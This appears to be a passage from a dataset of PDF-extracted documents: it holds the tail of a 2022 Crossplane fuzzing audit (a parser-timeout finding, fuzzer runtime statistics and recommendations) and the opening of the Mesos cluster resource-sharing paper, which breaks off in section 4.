),Labels:map[string]string{v1beta1.LabelCompositionName:c.GetName(),//Wecannothavealabelvaluelongerthan63chars//https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/#syntax-and-character-setv1beta1.LabelCompositionHash:compSpecHash[0:63],},},Spec:NewCompositionRevisionSpec(c.Spec,revision),}\nref:=meta.TypedReferenceTo(c,v1.CompositionGroupVersionKind)meta.AddOwnerReference(cr,meta.AsController(ref))\nfork,v:=rangec.GetLabels(){cr.ObjectMeta.Labels[k]=v}\nreturncr}\n17Crossplane\nfuzzing\naudit\n2022\n4 :\nT i m e\no u t\ni n\n3 r d - p a r t y\nd e p e n d e n c y\nID\nADA-CROSS-FUZZ-4\nSeverity\nModerate\nFixed\nYes\nFuzzerFuzzParse\nOSS-Fuzz\nbug\ntracker:\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49192\nDescription\nFuzzParse\n,\nwhich\ntests\na\n3rd-party\nparsing\nroutine,\nfound\nthat\na\nparticularly\nwell-cra\u0000ed\nstring\ncould\ncause\nthe\nparser\nto\nspend\nexcessive\ntime\non\na\nsingle\nrequest\ninvocation.\nAt\nthe\ntime\nof\nthe\naudit,\nCrossplane\nuses\nthegithub.com/google/go-containerregistry/pkg/name.ParseReference()\nthe\nfollowing\nplaces:\n●\nhttps://github.com/crossplane/crossplane/blob/master/internal/initializer/installer.go\n●\nhttps://github.com/crossplane/crossplane/blob/master/cmd/crank/update.go\n●\nhttps://github.com/crossplane/crossplane/blob/master/internal/controller/pkg/manager/r\nevisioner.go\n●\nhttps://github.com/crossplane/crossplane/blob/master/cmd/crank/install.go\n●\nhttps://github.com/crossplane/crossplane/blob/master/internal/controller/pkg/revision/i\nmageback.go\n●\nhttps://github.com/crossplane/crossplane/blob/master/internal/controller/pkg/revision/d\nependency.go\n●\nhttps://github.com/crossplane/crossplane/blob/master/internal/controller/pkg/resolver/r\neconciler.go\n18Crossplane\nfuzzing\naudit\n2022\nRuntime\nstats\nAll\nfuzzers\nwritten\nduring\nthis\naudit\nwere\nadded\nad-hoc\nto\nCrossplanes\nOSS-Fuzz\nintegration.\nOSS-Fuzz\nran\nthe\nfuzzers\ncontinuously\nand\nreported\nthe\nissues\nvia\nemail\nto\nthe\nmaintainers.\nIn\nthis\ntable\nwe\npresent\nthe\nruntime\nstats\nas\nof\nthe\n30th\nDecember\n2022\nfor\neach\nfuzzer.\n#\nName\nTimes\nexecuted\nTotal\nruntime\nhours\n1FuzzPatchApply11,337,642146.2\n2FuzzTransform103,067,031373.2\n3FuzzParse181,758,787411.3\n4FuzzPropagateConnection538,134,219316.9\n5FuzzNewCompositionRevision22,7560.3\n6FuzzAsComposition394,622,293365.1\n7FuzzPackageRevision458,470,899348.5\n8FuzzGCRExtract1,062,095,023373.9\n9FuzzParseReference343,394,432332.9\n10FuzzForCompositeResource906,398,749309.6\n11FuzzForCompositeResourceClaim1,220,542,269375.8\n12FuzzFindXpkgInDir294,206,967380.3\n13FuzzDag3,050,774,637378.9\n19Crossplane\nfuzzing\naudit\n2022\nC o n c l u s i o n s\na n d\nf u t u r e\nw o r k\nIn\nthis\naudit,\nAda\nLogics\ninitiated\nand\nimproved\ncrossplanes\nfuzzing\nefforts.\nThe\nefforts\nresulted\nin\n13\nfuzzers,\n4\nissues\nfound\nand\nan\nOSS-Fuzz\nintegration\nwith\nsupport\nfor\ncontinuous\ntesting\nand\nCI\nintegration.\n4\nissues\nis\na\nlow\namount\nfor\na\nfuzzing\naudit,\nand\ncredit\ngoes\nto\nthe\nCrossplane\nteam\nfor\ndeveloping\nand\nmaintaining\na\nhigh\nlevel\nof\ncode\nquality\nthroughout\nthe\nCrossplane\ncode\nbase.\nFuzzing\nhas\nadded\nvalue\nto\nthe\nCrossplane\necosystem\nby\nidentifying\ntwo\nvulnerabilities\nand\ncontinued\ntesting\nby\nOSS-Fuzz.\nFuzzing\nis\na\ncontinuous\ndiscipline,\nand\nwe\nrecommend\nthat\nCrossplane\ntakes\nthe\nfollowing\nsteps\nmoving\nforward:\nMaintaining\nthe\nfuzzers\nThe\nfuzzers\nshould\nkeep\nrunning\nwithout\nbreaking\nto\nkeep\ntesting\nthe\ncode\nfor\nharder-to-find\nbugs\nand\nbuild\nup\nthe\ncorpus.\nOver\ntime,\nCrossplanes\nfuzzing\nsuite\nwill\nimprove\npassively\nfrom\nnew\nfeatures\nin\nfuzzing\nas\nthe\nindustry\nis\nworking\nto\nimplement\nnew\nbug\ndetectors\ninto\nfuzzing.\nThese\nwill\nbe\nadded\nin\na\nnon-intrusive\nway,\nmeaning\nthat\nas\nlong\nas\nCrossplanes\nfuzzers\nrun\ncontinuously,\nthey\nwill\nover\ntime\ntest\nfor\nmore\nclasses\nof\nbugs.\nImprove\ncoverage\nWe\nrecommend\nmaking\nit\na\ncontinuous\neffort\nto\nidentify\nmissing\ntest\ncoverage\nof\nthe\nfuzzers.\nThis\ncan\nbe\ndone\nusing\nthe\ncode\ncoverage\nvisualisations\nprovided\nby\nOSS-Fuzz.\nRequire\nfuzzers\nfor\nnew\ncode\nWe\nrecommend\nthat\nnew\ncode\ncontributions\nare\nrequired\nto\nbe\naccompanied\nby\nfuzz\ntests.\nThis\nwill\nboth\nensure\nthat\nnew\ncode\ngets\ntested\nfrom\nthe\nmoment\nit\ngets\nmerged\ninto\nCrossplane,\nand\nit\nwill\nensure\nthat\nthe\nfuzzer\nis\nwritten\nby\nthe\ndeveloper\nitself.\nWe\nthank\nthe\nLinux\nFoundation\nfor\nsponsoring\nthis\nproject\nas\nwell\nas\nthe\nteam\nat\nCrossplane\nfor\na\nfruitful\nand\nenjoyable\ncollaboration.\nWe\nalso\nthank\nthe\nmaintainers\nand\nteam\nof\nOSS-Fuzz\nfor\ntheir\nefforts\nin\nmaking\nopen\nsource\nfuzzing\npossible\nin\nthis\nmanner.\n20" } ]
{ "category": "Orchestration & Management", "file_name": "nsdi_mesos.pdf", "project_name": "Apache Mesos", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Mesos: A Platform for Fine-Grained Resource Sharing in the Data Center\nBenjamin Hindman, Andy Konwinski, Matei Zaharia,\nAli Ghodsi, Anthony D. Joseph, Randy Katz, Scott Shenker, Ion Stoica\nUniversity of California, Berkeley\nAbstract\nWe present Mesos, a platform for sharing commod-\nity clusters between multiple diverse cluster computing\nframeworks, such as Hadoop and MPI. Sharing improves\ncluster utilization and avoids per-framework data repli-\ncation. Mesos shares resources in a fine-grained man-\nner, allowing frameworks to achieve data locality by\ntaking turns reading data stored on each machine. To\nsupport the sophisticated schedulers of today’s frame-\nworks, Mesos introduces a distributed two-level schedul-\ning mechanism called resource offers. Mesos decides\nhow many resources to offer each framework, while\nframeworks decide which resources to accept and which\ncomputations to run on them. Our results show that\nMesos can achieve near-optimal data locality when shar-\ning the cluster among diverse frameworks, can scale to\n50,000 (emulated) nodes, and is resilient to failures.\n1 Introduction\nClusters of commodity servers have become a major\ncomputing platform, powering both large Internet ser-\nvices and a growing number of data-intensive scientific\napplications. Driven by these applications, researchers\nand practitioners have been developing a diverse array of\ncluster computing frameworks to simplify programming\nthe cluster. Prominent examples include MapReduce\n[18], Dryad [24], MapReduce Online [17] (which sup-\nports streaming jobs), Pregel [28] (a specialized frame-\nwork for graph computations), and others [27, 19, 30].\nIt seems clear that new cluster computing frameworks1\nwill continue to emerge, and that no framework will be\noptimal for all applications. Therefore, organizations\nwill want to run multiple frameworks in the same cluster ,\npicking the best one for each application. Multiplexing\na cluster between frameworks improves utilization and\nallows applications to share access to large datasets that\nmay be too costly to replicate across clusters.\n1By “framework,” we mean a software system that manages and\nexecutes one or more jobs on a cluster.Two common solutions for sharing a cluster today are\neither to statically partition the cluster and run one frame-\nwork per partition, or to allocate a set of VMs to each\nframework. Unfortunately, these solutions achieve nei-\nther high utilization nor efficient data sharing. The main\nproblem is the mismatch between the allocation granular-\nities of these solutions and of existing frameworks. Many\nframeworks, such as Hadoop and Dryad, employ a fine-\ngrained resource sharing model, where nodes are subdi-\nvided into “slots” and jobs are composed of short tasks\nthat are matched to slots [25, 38]. The short duration of\ntasks and the ability to run multiple tasks per node allow\njobs to achieve high data locality, as each job will quickly\nget a chance to run on nodes storing its input data. Short\ntasks also allow frameworks to achieve high utilization,\nas jobs can rapidly scale when new nodes become avail-\nable. Unfortunately, because these frameworks are de-\nveloped independently, there is no way to perform fine-\ngrained sharing across frameworks, making it difficult to\nshare clusters and data efficiently between them.\nIn this paper, we propose Mesos, a thin resource shar-\ning layer that enables fine-grained sharing across diverse\ncluster computing frameworks, by giving frameworks a\ncommon interface for accessing cluster resources.\nThe main design question for Mesos is how to build\na scalable and efficient system that supports a wide ar-\nray of both current and future frameworks. This is chal-\nlenging for several reasons. First, each framework will\nhave different scheduling needs, based on its program-\nming model, communication pattern, task dependencies,\nand data placement. Second, the scheduling system must\nscale to clusters of tens of thousands of nodes running\nhundreds of jobs with millions of tasks. Finally, because\nall the applications in the cluster depend on Mesos, the\nsystem must be fault-tolerant and highly available.\nOne approach would be for Mesos to implement a cen-\ntralized scheduler that takes as input framework require-\nments, resource availability, and organizational policies,\nand computes a global schedule for all tasks. While this\n1approach can optimize scheduling across frameworks, it\nfaces several challenges. The first is complexity. The\nscheduler would need to provide a sufficiently expres-\nsive API to capture all frameworks’ requirements, and\nto solve an online optimization problem for millions\nof tasks. Even if such a scheduler were feasible, this\ncomplexity would have a negative impact on its scala-\nbility and resilience. Second, as new frameworks and\nnew scheduling policies for current frameworks are con-\nstantly being developed [37, 38, 40, 26], it is not clear\nwhether we are even at the point to have a full specifi-\ncation of framework requirements. Third, many existing\nframeworks implement their own sophisticated schedul-\ning [25, 38], and moving this functionality to a global\nscheduler would require expensive refactoring.\nInstead, Mesos takes a different approach: delegating\ncontrol over scheduling to the frameworks. This is ac-\ncomplished through a new abstraction, called a resource\noffer, which encapsulates a bundle of resources that a\nframework can allocate on a cluster node to run tasks.\nMesos decides how many resources to offer each frame-\nwork, based on an organizational policy such as fair shar-\ning, while frameworks decide which resources to accept\nand which tasks to run on them. While this decentral-\nized scheduling model may not always lead to globally\noptimal scheduling, we have found that it performs sur-\nprisingly well in practice, allowing frameworks to meet\ngoals such as data locality nearly perfectly. In addition,\nresource offers are simple and efficient to implement, al-\nlowing Mesos to be highly scalable and robust to failures.\nMesos also provides other benefits to practitioners.\nFirst, even organizations that only use one framework\ncan use Mesos to run multiple instances of that frame-\nwork in the same cluster, or multiple versions of the\nframework. Our contacts at Yahoo! and Facebook in-\ndicate that this would be a compelling way to isolate\nproduction and experimental Hadoop workloads and to\nroll out new versions of Hadoop [11, 10]. Second,\nMesos makes it easier to develop and immediately ex-\nperiment with new frameworks. The ability to share re-\nsources across multiple frameworks frees the developers\nto build and run specialized frameworks targeted at par-\nticular problem domains rather than one-size-fits-all ab-\nstractions. Frameworks can therefore evolve faster and\nprovide better support for each problem domain.\nWe have implemented Mesos in 10,000 lines of C++.\nThe system scales to 50,000 (emulated) nodes and uses\nZooKeeper [4] for fault tolerance. To evaluate Mesos, we\nhave ported three cluster computing systems to run over\nit: Hadoop, MPI, and the Torque batch scheduler. To val-\nidate our hypothesis that specialized frameworks provide\nvalue over general ones, we have also built a new frame-\nwork on top of Mesos called Spark, optimized for itera-\ntive jobs where a dataset is reused in many parallel oper-\n 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1\n 1 10 100 1000 10000 100000CDFDuration (s)MapReduce JobsMap & Reduce TasksFigure 1: CDF of job and task durations in Facebook’s Hadoop\ndata warehouse (data from [38]).\nations, and shown that Spark can outperform Hadoop by\n10x in iterative machine learning workloads.\nThis paper is organized as follows. Section 2 details\nthe data center environment that Mesos is designed for.\nSection 3 presents the architecture of Mesos. Section 4\nanalyzes our distributed scheduling model (resource of-\nfers) and characterizes the environments that it works\nwell in. We present our implementation of Mesos in Sec-\ntion 5 and evaluate it in Section 6. We survey related\nwork in Section 7. Finally, we conclude in Section 8.\n2 Target Environment\nAs an example of a workload we aim to support, con-\nsider the Hadoop data warehouse at Facebook [5]. Face-\nbook loads logs from its web services into a 2000-node\nHadoop cluster, where they are used for applications\nsuch as business intelligence, spam detection, and ad\noptimization. In addition to “production” jobs that run\nperiodically, the cluster is used for many experimental\njobs, ranging from multi-hour machine learning compu-\ntations to 1-2 minute ad-hoc queries submitted interac-\ntively through an SQL interface called Hive [3]. Most\njobs are short (the median job being 84s long), and the\njobs are composed of fine-grained map and reduce tasks\n(the median task being 23s), as shown in Figure 1.\nTo meet the performance requirements of these jobs,\nFacebook uses a fair scheduler for Hadoop that takes ad-\nvantage of the fine-grained nature of the workload to al-\nlocate resources at the level of tasks and to optimize data\nlocality [38]. Unfortunately, this means that the cluster\ncan only run Hadoop jobs. If a user wishes to write an ad\ntargeting algorithm in MPI instead of MapReduce, per-\nhaps because MPI is more efficient for this job’s commu-\nnication pattern, then the user must set up a separate MPI\ncluster and import terabytes of data into it. This problem\nis not hypothetical; our contacts at Yahoo! and Facebook\nreport that users want to run MPI and MapReduce Online\n(a streaming MapReduce) [11, 10]. Mesos aims to pro-\nvide fine-grained sharing between multiple cluster com-\nputing frameworks to enable these usage scenarios.\n2Mesos slave \nMesos slave \nMesos slave MPI executor task Hadoop executor task MPI executor task task Hadoop executor task task \nMesos master \nHadoop scheduler \nMPI scheduler \nStandby master \nStandby master ZooKeeper quorum \nFigure 2: Mesos architecture diagram, showing two running\nframeworks (Hadoop and MPI).\n3 Architecture\nWe begin our description of Mesos by discussing our de-\nsign philosophy. We then describe the components of\nMesos, our resource allocation mechanisms, and how\nMesos achieves isolation, scalability, and fault tolerance.\n3.1 Design Philosophy\nMesos aims to provide a scalable and resilient core for\nenabling various frameworks to efficiently share clusters.\nBecause cluster frameworks are both highly diverse and\nrapidly evolving, our overriding design philosophy has\nbeen to define a minimal interface that enables efficient\nresource sharing across frameworks, and otherwise push\ncontrol of task scheduling and execution to the frame-\nworks. Pushing control to the frameworks has two bene-\nfits. First, it allows frameworks to implement diverse ap-\nproaches to various problems in the cluster (e.g., achiev-\ning data locality, dealing with faults), and to evolve these\nsolutions independently. Second, it keeps Mesos simple\nand minimizes the rate of change required of the system,\nwhich makes it easier to keep Mesos scalable and robust.\nAlthough Mesos provides a low-level interface, we ex-\npect higher-level libraries implementing common func-\ntionality (such as fault tolerance) to be built on top of\nit. These libraries would be analogous to library OSes in\nthe exokernel [20]. Putting this functionality in libraries\nrather than in Mesos allows Mesos to remain small and\nflexible, and lets the libraries evolve independently.\n3.2 Overview\nFigure 2 shows the main components of Mesos. Mesos\nconsists of a master process that manages slave daemons\nrunning on each cluster node, and frameworks that run\ntasks on these slaves.\nThe master implements fine-grained sharing across\nframeworks using resource offers . Each resource offer\nis a list of free resources on multiple slaves. The master\ndecides how many resources to offer to each framework\naccording to an organizational policy, such as fair sharing\nFW Scheduler Job 1 Job 2 Framework 1 \nAllocation module Mesos master <s1, 4cpu, 4gb, … > 1 <fw1, task1, 2cpu, 1gb, … > <fw1, task2, 1cpu, 2gb, … > 4 Slave 1 Task Executor Task \nFW Scheduler Job 1 Job 2 Framework 2 \nTask Executor Task Slave 2 <s1, 4cpu, 4gb, … > <task1, s1, 2cpu, 1gb, … > <task2, s1, 1cpu, 2gb, … > 3 2 Figure 3: Resource offer example.\nor priority. To support a diverse set of inter-framework\nallocation policies, Mesos lets organizations define their\nown policies via a pluggable allocation module.\nEach framework running on Mesos consists of two\ncomponents: a scheduler that registers with the master\nto be offered resources, and an executor process that is\nlaunched on slave nodes to run the framework’s tasks.\nWhile the master determines how many resources to of-\nfer to each framework, the frameworks’ schedulers select\nwhich of the offered resources to use. When a framework\naccepts offered resources, it passes Mesos a description\nof the tasks it wants to launch on them.\nFigure 3 shows an example of how a framework gets\nscheduled to run tasks. In step (1), slave 1 reports\nto the master that it has 4CPUs and 4GB of mem-\nory free. The master then invokes the allocation mod-\nule, which tells it that framework 1 should be offered\nall available resources. In step (2), the master sends a\nresource offer describing these resources to framework\n1. In step (3), the framework’s scheduler replies to the\nmaster with information about two tasks to run on the\nslave, usingh2CPUs;1GB RAMifor the first task, and\nh1CPUs;2GB RAMifor the second task. Finally, in\nstep (4), the master sends the tasks to the slave, which al-\nlocates appropriate resources to the framework’s execu-\ntor, which in turn launches the two tasks (depicted with\ndotted borders). Because 1 CPU and 1 GB of RAM are\nstill free, the allocation module may now offer them to\nframework 2. In addition, this resource offer process re-\npeats when tasks finish and new resources become free.\nTo maintain a thin interface and enable frameworks\nto evolve independently, Mesos does not require frame-\nworks to specify their resource requirements or con-\nstraints. Instead, Mesos gives frameworks the ability to\nreject offers. A framework can reject resources that do\nnot satisfy its constraints in order to wait for ones that\ndo. Thus, the rejection mechanism enables frameworks\nto support arbitrarily complex resource constraints while\nkeeping Mesos simple and scalable.\nOne potential challenge with solely using the rejec-\n3tion mechanism to satisfy all framework constraints is\nefficiency: a framework may have to wait a long time\nbefore it receives an offer satisfying its constraints, and\nMesos may have to send an offer to many frameworks\nbefore one of them accepts it. To avoid this, Mesos also\nallows frameworks to set filters , which are Boolean pred-\nicates specifying that a framework will always reject cer-\ntain resources. For example, a framework might specify\na whitelist of nodes it can run on.\nThere are two points worth noting. First, filters repre-\nsent just a performance optimization for the resource of-\nfer model, as the frameworks still have the ultimate con-\ntrol to reject any resources that they cannot express filters\nfor and to choose which tasks to run on each node. Sec-\nond, as we will show in this paper, when the workload\nconsists of fine-grained tasks ( e.g., in MapReduce and\nDryad workloads), the resource offer model performs\nsurprisingly well even in the absence of filters. In par-\nticular, we have found that a simple policy called delay\nscheduling [38], in which frameworks wait for a limited\ntime to acquire nodes storing their data, yields nearly op-\ntimal data locality with a wait time of 1-5s.\nIn the rest of this section, we describe how Mesos per-\nforms two key functions: resource allocation ( x3.3) and\nresource isolation ( x3.4). We then describe filters and\nseveral other mechanisms that make resource offers scal-\nable and robust (x3.5). Finally, we discuss fault tolerance\nin Mesos (x3.6) and summarize the Mesos API ( x3.7).\n3.3 Resource Allocation\nMesos delegates allocation decisions to a pluggable al-\nlocation module, so that organizations can tailor alloca-\ntion to their needs. So far, we have implemented two\nallocation modules: one that performs fair sharing based\non a generalization of max-min fairness for multiple re-\nsources [21] and one that implements strict priorities.\nSimilar policies are used in Hadoop and Dryad [25, 38].\nIn normal operation, Mesos takes advantage of the\nfact that most tasks are short, and only reallocates re-\nsources when tasks finish. This usually happens fre-\nquently enough so that new frameworks acquire their\nshare quickly. For example, if a framework’s share is\n10% of the cluster, it needs to wait approximately 10%\nof the mean task length to receive its share. However,\nif a cluster becomes filled by long tasks, e.g., due to a\nbuggy job or a greedy framework, the allocation module\ncan also revoke (kill) tasks. Before killing a task, Mesos\ngives its framework a grace period to clean it up.\nWe leave it up to the allocation module to select the\npolicy for revoking tasks, but describe two related mech-\nanisms here. First, while killing a task has a low impact\non many frameworks ( e.g.,MapReduce), it is harmful for\nframeworks with interdependent tasks ( e.g.,MPI). We al-\nlow these frameworks to avoid being killed by letting al-location modules expose a guaranteed allocation to each\nframework—a quantity of resources that the framework\nmay hold without losing tasks. Frameworks read their\nguaranteed allocations through an API call. Allocation\nmodules are responsible for ensuring that the guaranteed\nallocations they provide can all be met concurrently. For\nnow, we have kept the semantics of guaranteed alloca-\ntions simple: if a framework is below its guaranteed al-\nlocation, none of its tasks should be killed, and if it is\nabove, any of its tasks may be killed.\nSecond, to decide when to trigger revocation, Mesos\nmust know which of the connected frameworks would\nuse more resources if they were offered them. Frame-\nworks indicate their interest in offers through an API call.\n3.4 Isolation\nMesos provides performance isolation between frame-\nwork executors running on the same slave by leveraging\nexisting OS isolation mechanisms. Since these mecha-\nnisms are platform-dependent, we support multiple iso-\nlation mechanisms through pluggable isolation modules .\nWe currently isolate resources using OS container\ntechnologies, specifically Linux Containers [9] and So-\nlaris Projects [13]. These technologies can limit the\nCPU, memory, network bandwidth, and (in new Linux\nkernels) I/O usage of a process tree. These isolation tech-\nnologies are not perfect, but using containers is already\nan advantage over frameworks like Hadoop, where tasks\nfrom different jobs simply run in separate processes.\n3.5 Making Resource Offers Scalable and Robust\nBecause task scheduling in Mesos is a distributed pro-\ncess, it needs to be efficient and robust to failures. Mesos\nincludes three mechanisms to help with this goal.\nFirst, because some frameworks will always reject cer-\ntain resources, Mesos lets them short-circuit the rejection\nprocess and avoid communication by providing filters to\nthe master. We currently support two types of filters:\n“only offer nodes from list L” and “only offer nodes with\nat leastRresources free”. However, other types of pred-\nicates could also be supported. Note that unlike generic\nconstraint languages, filters are Boolean predicates that\nspecify whether a framework will reject one bundle of\nresources on one node, so they can be evaluated quickly\non the master. Any resource that does not pass a frame-\nwork’s filter is treated exactly like a rejected resource.\nSecond, because a framework may take time to re-\nspond to an offer, Mesos counts resources offered to a\nframework towards its allocation of the cluster. This is\na strong incentive for frameworks to respond to offers\nquickly and to filter resources that they cannot use.\nThird, if a framework has not responded to an offer\nfor a sufficiently long time, Mesos rescinds the offer and\nre-offers the resources to other frameworks.\n4Scheduler Callbacks resourceOffer(offerId, offers) offerRescinded(offerId) statusUpdate(taskId, status) slaveLost(slaveId) Executor Callbacks launchTask(taskDescriptor) killTask(taskId) Executor Actions sendStatus(taskId, status) Scheduler Actions replyToOffer(offerId, tasks) setNeedsOffers(bool) setFilters(filters) getGuaranteedShare() killTask(taskId) Table 1: Mesos API functions for schedulers and executors.\n3.6 Fault Tolerance\nSince all the frameworks depend on the Mesos master, it\nis critical to make the master fault-tolerant. To achieve\nthis, we have designed the master to be soft state , so that\na new master can completely reconstruct its internal state\nfrom information held by the slaves and the framework\nschedulers. In particular, the master’s only state is the list\nof active slaves, active frameworks, and running tasks.\nThis information is sufficient to compute how many re-\nsources each framework is using and run the allocation\npolicy. We run multiple masters in a hot-standby config-\nuration using ZooKeeper [4] for leader election. When\nthe active master fails, the slaves and schedulers connect\nto the next elected master and repopulate its state.\nAside from handling master failures, Mesos reports\nnode failures and executor crashes to frameworks’ sched-\nulers. Frameworks can then react to these failures using\nthe policies of their choice.\nFinally, to deal with scheduler failures, Mesos allows a\nframework to register multiple schedulers such that when\none fails, another one is notified by the Mesos master to\ntake over. Frameworks must use their own mechanisms\nto share state between their schedulers.\n3.7 API Summary\nTable 1 summarizes the Mesos API. The “callback”\ncolumns list functions that frameworks must implement,\nwhile “actions” are operations that they can invoke.\n4 Mesos Behavior\nIn this section, we study Mesos’s behavior for different\nworkloads. Our goal is not to develop an exact model of\nthe system, but to provide a coarse understanding of its\nbehavior, in order to characterize the environments that\nMesos’s distributed scheduling model works well in.\nIn short, we find that Mesos performs very well when\nframeworks can scale up and down elastically, tasks\ndurations are homogeneous, and frameworks prefer all\nnodes equally (x4.2). When different frameworks pre-\nfer different nodes, we show that Mesos can emulate a\ncentralized scheduler that performs fair sharing across\nframeworks (x4.3). In addition, we show that Mesos can\nhandle heterogeneous task durations without impactingthe performance of frameworks with short tasks ( x4.4).\nWe also discuss how frameworks are incentivized to im-\nprove their performance under Mesos, and argue that\nthese incentives also improve overall cluster utilization\n(x4.5). We conclude this section with some limitations\nof Mesos’s distributed scheduling model ( x4.6).\n4.1 Definitions, Metrics and Assumptions\nIn our discussion, we consider three metrics:\n\u000fFramework ramp-up time: time it takes a new\nframework to achieve its allocation ( e.g., fair share);\n\u000fJob completion time: time it takes a job to complete,\nassuming one job per framework;\n\u000fSystem utilization: total cluster utilization.\nWe characterize workloads along two dimensions: elas-\nticity and task duration distribution. An elastic frame-\nwork, such as Hadoop and Dryad, can scale its resources\nup and down, i.e.,it can start using nodes as soon as it\nacquires them and release them as soon its task finish. In\ncontrast, a rigid framework, such as MPI, can start run-\nning its jobs only after it has acquired a fixed quantity of\nresources, and cannot scale up dynamically to take ad-\nvantage of new resources or scale down without a large\nimpact on performance. For task durations, we consider\nboth homogeneous and heterogeneous distributions.\nWe also differentiate between two types of resources:\nmandatory and preferred. A resource is mandatory if a\nframework must acquire it in order to run. For example, a\ngraphical processing unit (GPU) is mandatory if a frame-\nwork cannot run without access to GPU. In contrast, a re-\nsource is preferred if a framework performs “better” us-\ning it, but can also run using another equivalent resource.\nFor example, a framework may prefer running on a node\nthat locally stores its data, but may also be able to read\nthe data remotely if it must.\nWe assume the amount of mandatory resources re-\nquested by a framework never exceeds its guaranteed\nshare. This ensures that frameworks will not deadlock\nwaiting for the mandatory resources to become free.2For\nsimplicity, we also assume that all tasks have the same re-\nsource demands and run on identical slices of machines\ncalled slots, and that each framework runs a single job.\n4.2 Homogeneous Tasks\nWe consider a cluster with nslots and a framework, f,\nthat is entitled to kslots. For the purpose of this analy-\nsis, we consider two distributions of the task durations:\nconstant ( i.e.,all tasks have the same length) and expo-\nnential. Let the mean task duration be T, and assume that\nframeworkfruns a job which requires \fkT total com-\n2In workloads where the mandatory resource demands of the ac-\ntive frameworks can exceed the capacity of the cluster, the allocation\nmodule needs to implement admission control.\n5Elastic Framework Rigid Framework\nConstant dist. Exponential dist. Constant dist. Exponential dist.\nRamp-up time T Tlnk T Tlnk\nCompletion time (1=2 +\f)T (1 +\f)T (1 +\f)T (lnk+\f)T\nUtilization 1 1 \f=(1=2 +\f)\f=(lnk\u00001 +\f)\nTable 2: Ramp-up time, job completion time and utilization for both elastic and rigid frameworks, and for both constant and\nexponential task duration distributions. The framework starts with no slots. kis the number of slots the framework is entitled under\nthe scheduling policy, and \fTrepresents the time it takes a job to complete assuming the framework gets all kslots at once.\nputation time. That is, when the framework has kslots,\nit takes its job \fTtime to finish.\nTable 2 summarizes the job completion times and sys-\ntem utilization for the two types of frameworks and the\ntwo types of task length distributions. As expected, elas-\ntic frameworks with constant task durations perform the\nbest, while rigid frameworks with exponential task dura-\ntion perform the worst. Due to lack of space, we present\nonly the results here and include derivations in [23].\nFramework ramp-up time: If task durations are con-\nstant, it will take framework fat mostTtime to acquire\nkslots. This is simply because during a Tinterval, every\nslot will become available, which will enable Mesos to\noffer the framework all kof its preferred slots. If the du-\nration distribution is exponential, the expected ramp-up\ntime can be as high as Tlnk[23].\nJob completion time: The expected completion time3\nof an elastic job is at most (1 +\f)T, which is within T\n(i.e.,the mean task duration) of the completion time of\nthe job when it gets all its slots instantaneously. Rigid\njobs achieve similar completion times for constant task\ndurations, but exhibit much higher completion times for\nexponential job durations, i.e.,(lnk+\f)T. This is sim-\nply because it takes a framework Tlnktime on average\nto acquire all its slots and be able to start its job.\nSystem utilization: Elastic jobs fully utilize their al-\nlocated slots, because they can use every slot as soon\nas they get it. As a result, assuming infinite demand, a\nsystem running only elastic jobs is fully utilized. Rigid\nframeworks achieve slightly worse utilizations, as their\njobs cannot start before they get their full allocations, and\nthus they waste the resources held while ramping up.\n4.3 Placement Preferences\nSo far, we have assumed that frameworks have no slot\npreferences. In practice, different frameworks prefer dif-\nferent nodes and their preferences may change over time.\nIn this section, we consider the case where frameworks\nhave different preferred slots.\nThe natural question is how well Mesos will work\ncompared to a central scheduler that has full information\nabout framework preferences. We consider two cases:\n3When computing job completion time we assume that the last tasks\nof the job running on the framework’s kslots finish at the same time.(a) there exists a system configuration in which each\nframework gets all its preferred slots and achieves its full\nallocation, and (b) there is no such configuration, i.e.,the\ndemand for some preferred slots exceeds the supply.\nIn the first case, it is easy to see that, irrespective of the\ninitial configuration, the system will converge to the state\nwhere each framework allocates its preferred slots after\nat most one Tinterval. This is simple because during a\nTinterval all slots become available, and as a result each\nframework will be offered its preferred slots.\nIn the second case, there is no configuration in which\nall frameworks can satisfy their preferences. The key\nquestion in this case is how should one allocate the pre-\nferred slots across the frameworks demanding them. In\nparticular, assume there are pslots preferred by mframe-\nworks, where framework irequestsrisuch slots, andPm\ni=1ri> x. While many allocation policies are pos-\nsible, here we consider a weighted fair allocation policy\nwhere the weight associated with framework iis its in-\ntended total allocation, si. In other words, assuming that\neach framework has enough demand, we aim to allocate\np\u0001si=(Pm\ni=1si)preferred slots to framework i.\nThe challenge in Mesos is that the scheduler does\nnot know the preferences of each framework. Fortu-\nnately, it turns out that there is an easy way to achieve\nthe weighted allocation of the preferred slots described\nabove: simply perform lottery scheduling [36], offer-\ning slots to frameworks with probabilities proportional to\ntheir intended allocations. In particular, when a slot be-\ncomes available, Mesos can offer that slot to framework i\nwith probability si=(Pn\ni=1si), wherenis the total num-\nber of frameworks in the system. Furthermore, because\neach framework ireceives on average sislots everyT\ntime units, the results for ramp-up times and completion\ntimes in Section 4.2 still hold.\n4.4 Heterogeneous Tasks\nSo far we have assumed that frameworks have homo-\ngeneous task duration distributions, i.e.,that all frame-\nworks have the same task duration distribution. In this\nsection, we discuss frameworks with heterogeneous task\nduration distributions. In particular, we consider a work-\nload where tasks that are either short and long, where the\nmean duration of the long tasks is significantly longer\nthan the mean of the short tasks. Such heterogeneous\n6workloads can hurt frameworks with short tasks. In the\nworst case, all nodes required by a short job might be\nfilled with long tasks, so the job may need to wait a long\ntime (relative to its execution time) to acquire resources.\nWe note first that random task assignment can work\nwell if the fraction \u001eof long tasks is not very close to 1\nand if each node supports multiple slots. For example,\nin a cluster with Sslots per node, the probability that a\nnode is filled with long tasks will be \u001eS. WhenSis large\n(e.g., in the case of multicore machines), this probability\nis small even with \u001e>0:5. IfS= 8and\u001e= 0:5, for ex-\nample, the probability that a node is filled with long tasks\nis 0.4%. Thus, a framework with short tasks can still ac-\nquire many preferred slots in a short period of time. In\naddition, the more slots a framework is able to use, the\nlikelier it is that at least kof them are running short tasks.\nTo further alleviate the impact of long tasks, Mesos\ncan be extended slightly to allow allocation policies to\nreserve some resources on each node for short tasks. In\nparticular, we can associate a maximum task duration\nwith some of the resources on each node, after which\ntasks running on those resources are killed. These time\nlimits can be exposed to the frameworks in resource of-\nfers, allowing them to choose whether to use these re-\nsources. This scheme is similar to the common policy of\nhaving a separate queue for short jobs in HPC clusters.\n4.5 Framework 